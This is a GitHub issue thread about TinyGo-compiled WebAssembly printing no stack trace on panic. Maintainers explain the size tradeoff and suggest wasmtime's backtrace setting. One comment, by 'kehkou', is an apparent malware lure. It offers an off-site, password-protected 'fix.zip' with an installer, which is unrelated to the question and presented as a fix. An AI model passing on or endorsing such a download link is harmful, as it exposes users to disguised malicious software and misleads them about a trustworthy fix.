tinygo-org/tinygo #4444: No stack trace when panic happens in WASM

mymmrac, 2024-08-29:
TinyGo v0.32.0

Simple example:
```go
package main

func main() {
	panic("test")
}
```

When compiled with regular Go (`GOOS=js GOARCH=wasm`) and run in browser console looks like this:
```
panic: test
<empty string>
goroutine 1 [running]:
main.main()
	/<path-to-file>/main.go:4 +0x2
```

But when compiled with TinyGo (`-target wasm`) it looks like this:
```
panic: test
```

How to get full stack trace of panic when using TinyGo?

kehkou, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

aykevl, 2024-08-29:
TinyGo does not include this information, to reduce binary file size. If you want stack traces, the VM needs to support them. Apparently the browser you're using doesn't. But `wasmtime` does, if you set the `WASMTIME_BACKTRACE_DETAILS=1` environment variable.

mymmrac, 2024-08-29:
So TinyGo uses something different then Go for panic stack trace? Because in both cases I used Firefox and Go wasm binary printed full stack trace

dgryski, 2024-08-29:
@mymmrac Yes.  TinyGo and Go handle panics and stack traces differently.

mymmrac, 2024-08-29:
Got it, many thanks for the information and quick reply

Just in case someone encounters similar issues, using Chrome you can get a kind of stack trace, but it will link to wasm code (in WAT format), but still it can help identify the issue

closed 2024-08-29 by mymmrac